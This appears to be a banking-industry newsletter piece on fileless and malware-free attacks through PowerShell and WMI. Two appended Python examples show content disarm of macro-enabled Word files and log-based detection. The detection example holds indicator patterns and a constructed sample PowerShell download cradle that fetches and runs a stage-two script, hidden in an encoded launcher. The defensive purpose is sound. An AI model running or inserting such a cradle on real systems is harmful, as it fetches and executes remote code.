“Fileless” is banks' latest cybersecurity concern
Cyberattacks on banks and others have seemingly vanished from view, and that is exactly what makes them more dangerous.
Malicious software, the type criminals use to steal online banking login credentials from customer or employee desktops, has been getting more stealthy and effective over time, as its authors get progressively better at evading antivirus and antimalware programs (cf. Smart Insights Weekly #16-12, #16-49, #16-50).
But an emerging generation of malware is sneakier still. It is designed not only to escape detection but to lurk in computer memory or inside a legitimate system tool, where conventional security software does not look, reports American Banker.
Malicious code that runs only in memory, without ever writing an executable to disk, is called “fileless.”
A related and more invasive form is the “malware-free intrusion,” in which the adversary carries out the attack with scripts run through legitimate tools already present in the environment.
“You cannot block them because they’re used for legitimate purposes in your environment, but they’re being compromised to assist in the intrusion for nefarious purpose,” said Dmitri Alperovitch, co-founder and CTO of CrowdStrike, the security company brought in to investigate the hack on the Democratic National Committee (cf. SIW #16-27).
Most existing antivirus and whitelisting technologies cannot cope with these attacks because they’re looking for malware and there’s no malware for them to find, he said.
The terms “fileless” and “malware-free” may evolve over time. But they describe a genre of cyberattack that banks need to watch.
A recent example was the hack of the Democratic National Committee (cf. SIW #16-27). That attack was carried out almost entirely using PowerShell and WMI, Alperovitch said. (PowerShell is Microsoft’s task automation and configuration management framework. Windows Management Instrumentation, or WMI, is Microsoft’s infrastructure for managing devices and applications across a network. Both ship with Windows and are used daily by administrators, so their mere presence and use raise no alarm.)
Research from Carbon Black, a security company, has found that 97% of organizations were targeted by a nonmalware attack in 2016.
Banks are a particular target of the newer attack type: Carbon Black’s research found more than 40% growth in attacks on financial institutions in 2016.
Most cyberattacks on banks start with phishing: convincing-looking emails carrying malicious attachments. Bank IT departments usually try to detonate those attachments in a sandbox, where they can be evaluated safely.
The newer, fileless variants are encrypted and carry logic that recognises a sandbox and, knowing what a sandbox looks for, simply refuses to run there. To the sandbox, and to IT, they look like benign Word attachments or PDF files.
An antidote is an alternative technology called content disarm and reconstruction (CDR), also marketed as content regeneration. Rather than trying to judge whether an attachment is malicious, it strips out any active or suspect content (macros, scripts, embedded objects) and delivers only the safe remainder to the recipient.
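The stripping step is the part of CDR worth seeing in code. The Python below is an added example, not code from the article or from any CDR vendor: it builds a minimal macro-enabled Word package (a constructed stand-in, not a real .docm) and rebuilds it without the VBA project, dropping the macro parts, the relationships that point at them and their content-type entries, and relabelling the main part as a plain document. The part names and content types follow the Office Open XML conventions for .docm files; the regex-based XML editing and the sample package are simplifications for illustration.

```python
import io
import re
import zipfile

# Content types of the main document part in a macro-enabled (.docm) and a
# plain (.docx) Word package, per the Office Open XML conventions.
MACRO_MAIN = "application/vnd.ms-word.document.macroEnabled.main+xml"
PLAIN_MAIN = "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"

# Constructed sample parts for a tiny macro-enabled document. Not a real file.
CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
    '<Default Extension="xml" ContentType="application/xml"/>'
    '<Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/>'
    f'<Override PartName="/word/document.xml" ContentType="{MACRO_MAIN}"/>'
    '<Override PartName="/word/vbaData.xml" ContentType="application/vnd.ms-word.vbaData+xml"/>'
    '</Types>'
)
DOCUMENT_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
    '<Relationship Id="rId2" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/>'
    '</Relationships>'
)
DOCUMENT_XML = ('<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                '<w:body><w:p><w:r><w:t>Invoice attached.</w:t></w:r></w:p></w:body></w:document>')


def build_sample_docm() -> bytes:
    """Assemble the constructed macro-enabled package as zip bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES)
        z.writestr("word/_rels/document.xml.rels", DOCUMENT_RELS)
        z.writestr("word/document.xml", DOCUMENT_XML)
        z.writestr("word/styles.xml", '<w:styles xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        z.writestr("word/vbaProject.bin", b"stand-in for the OLE compound file holding VBA streams")
        z.writestr("word/vbaData.xml", '<wne:vbaSuppData xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml"/>')
    return buf.getvalue()


# Anything whose part name starts with "vba" (vbaProject.bin, vbaData.xml, their .rels).
VBA_PART = re.compile(r"(^|/)vba[^/]*$", re.I)
# Relationship elements whose Type points at a VBA part.
VBA_RELATIONSHIP = re.compile(r'<Relationship\b[^>]*?Type="[^"]*?vba[^"]*"[^>]*?/>', re.I)
# Default/Override entries that describe VBA parts or VBA content types.
VBA_CONTENT_TYPE = re.compile(
    r'<(?:Default|Override)\b[^>]*?(?:ContentType="[^"]*?vba[^"]*"|PartName="[^"]*?/vba[^"]*")[^>]*?/>', re.I)


def disarm(docm_bytes: bytes) -> bytes:
    """Rebuild the package without its VBA project. The document text, styles
    and everything else are copied through; only macro-related parts, their
    relationships and their content-type entries are removed, and the main part
    is relabelled as a plain (non macro-enabled) document."""
    src = zipfile.ZipFile(io.BytesIO(docm_bytes))
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            if VBA_PART.search(info.filename):
                continue  # the macro container itself is dropped, not inspected
            data = src.read(info.filename)
            if info.filename == "[Content_Types].xml":
                text = VBA_CONTENT_TYPE.sub("", data.decode("utf-8"))
                data = text.replace(MACRO_MAIN, PLAIN_MAIN).encode("utf-8")
            elif info.filename.endswith(".rels"):
                data = VBA_RELATIONSHIP.sub("", data.decode("utf-8")).encode("utf-8")
            dst.writestr(info.filename, data)
    return out.getvalue()


def package_summary(pkg: bytes) -> dict:
    """Inspect a package: which parts it holds, whether any VBA trace survives,
    and which content type its main document part carries."""
    z = zipfile.ZipFile(io.BytesIO(pkg))
    names = z.namelist()
    ct = z.read("[Content_Types].xml").decode("utf-8")
    rels = z.read("word/_rels/document.xml.rels").decode("utf-8")
    return {
        "parts": sorted(names),
        "has_vba_part": any(VBA_PART.search(n) for n in names),
        "has_vba_relationship": "vba" in rels.lower(),
        "has_vba_content_type": "vba" in ct.lower(),
        "main_content_type": PLAIN_MAIN if PLAIN_MAIN in ct else (MACRO_MAIN if MACRO_MAIN in ct else None),
        "document_xml": z.read("word/document.xml").decode("utf-8"),
    }


if __name__ == "__main__":
    original = build_sample_docm()
    cleaned = disarm(original)
    for label, pkg in (("before", original), ("after", cleaned)):
        s = package_summary(pkg)
        print(label, s["parts"], "vba:", s["has_vba_part"], s["main_content_type"])
```

The rebuilt package should also be renamed from .docm to .docx, since Word checks the extension against the main content type. Commercial CDR goes further than this (re-rendering images, flattening PDFs and their JavaScript, rebuilding OLE objects), but the principle is the same: reconstruct from the parts you understand and never forward the parts you do not.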
Cyberattackers also know that typical antimalware tools look for files that have been written to disk. By running the attack from memory or burying it in the Windows registry, they fly under the radar.
Banks should assume they have already been breached, commission a compromise assessment, and work toward full visibility across their environment, since the only remaining evidence of these attacks is what the legitimate tools did, not what landed on disk.
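Because the PowerShell and WMI tradecraft described in the DNC example and the in-memory or registry-buried payloads described here leave nothing for a file scanner to find, detection has to come from what the legitimate tools were told to do. The Python below is an added example, not code from the article, American Banker, CrowdStrike or Carbon Black: it runs simple detection logic over constructed log lines loosely modelled on PowerShell script-block logging (Event ID 4104) and a Sysmon registry value-set event (Event ID 13), decodes -EncodedCommand arguments (PowerShell takes the base64 of the UTF-16LE script) so the cradle hidden inside them is visible, and flags registry values that hold a large base64 blob. The line formats, indicator patterns and thresholds are assumptions for illustration, not a vetted rule set.

```python
import base64
import re
from typing import Dict, List, Optional

SCRIPT_PREFIX = "4104 ScriptBlockText: "   # assumed line format for a PowerShell script-block entry
REGISTRY_PREFIX = "13 RegistryEvent: "     # assumed line format for a Sysmon registry value-set entry

# Behaviours associated with PowerShell/WMI tradecraft, matched against the
# text of a script block. Illustrative assumptions, not a vetted rule set.
INDICATORS = [
    ("encoded_command", re.compile(r"-e(?:ncodedcommand|nc|c)?\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    # IEX/Invoke-Expression together with a web download in the same block.
    ("download_cradle", re.compile(
        r"(?=.*\b(?:iex|invoke-expression)\b)"
        r"(?=.*(?:downloadstring|downloadfile|net\.webclient|invoke-webrequest))", re.I | re.S)),
    ("wmi_process_create", re.compile(
        r"(?:invoke-wmimethod|invoke-cimmethod|win32_process).*\bcreate\b", re.I | re.S)),
]
ENCODED_ARG = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# A registry value that is one long run of base64 (no path separators, no
# spaces) is a staged payload rather than an ordinary configuration value.
BASE64_BLOB = re.compile(r"^[A-Za-z0-9+/]{64,}={0,2}$")


def decode_encoded_command(text: str) -> Optional[str]:
    """Recover the script passed via -EncodedCommand. PowerShell expects the
    base64 of the UTF-16LE script; anything that does not decode that way
    (bad base64, odd byte count) is ignored rather than guessed at."""
    m = ENCODED_ARG.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except ValueError:  # binascii.Error and UnicodeDecodeError both derive from ValueError
        return None


def script_block_indicators(text: str) -> List[str]:
    """Indicators found in a script block, including those only visible after
    decoding an -EncodedCommand argument (reported with a 'decoded:' prefix)."""
    hits = [name for name, rx in INDICATORS if rx.search(text)]
    decoded = decode_encoded_command(text)
    if decoded is not None:
        hits += ["decoded:" + h for h in script_block_indicators(decoded)]
    return hits


def registry_value_indicators(details: str) -> List[str]:
    """Flag a registry value that is a large base64 blob: a payload buried in
    the registry rather than a path, a number or a short string."""
    return ["registry_base64_blob"] if BASE64_BLOB.match(details.strip()) else []


def analyze(lines: List[str]) -> Dict[int, List[str]]:
    """Map the index of each suspicious line to the indicators it triggered."""
    findings: Dict[int, List[str]] = {}
    for i, line in enumerate(lines):
        if line.startswith(SCRIPT_PREFIX):
            hits = script_block_indicators(line[len(SCRIPT_PREFIX):])
        elif line.startswith(REGISTRY_PREFIX) and " Details: " in line:
            hits = registry_value_indicators(line.split(" Details: ", 1)[1])
        else:
            hits = []
        if hits:
            findings[i] = hits
    return findings


# Constructed sample lines; not captured from any real system.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
ENCODED_STAGE2 = base64.b64encode(STAGE2.encode("utf-16le")).decode("ascii")
STORED_BLOB = base64.b64encode(bytes(96)).decode("ascii")  # stand-in for a script staged in the registry
SAMPLE_LOGS = [
    SCRIPT_PREFIX + "Get-Service | Where-Object { $_.Status -eq 'Running' }",
    SCRIPT_PREFIX + "powershell.exe -NoP -W Hidden -EncodedCommand " + ENCODED_STAGE2,
    SCRIPT_PREFIX + "Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'cmd.exe /c whoami'",
    REGISTRY_PREFIX + "HKCU\\Software\\Classes\\Staging Details: " + STORED_BLOB,
    REGISTRY_PREFIX + "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run Details: C:\\Program Files\\Vendor\\app.exe",
]

if __name__ == "__main__":
    for idx, hits in analyze(SAMPLE_LOGS).items():
        print(idx, hits)
```

The benign lines (a service query, a vendor executable in a Run key) trigger nothing, while the encoded launcher is reported together with the cradle recovered from inside it. None of this depends on a file hash: it needs script-block logging and registry auditing to be switched on and shipped somewhere an attacker cannot simply clear, which is the visibility the article argues banks must build.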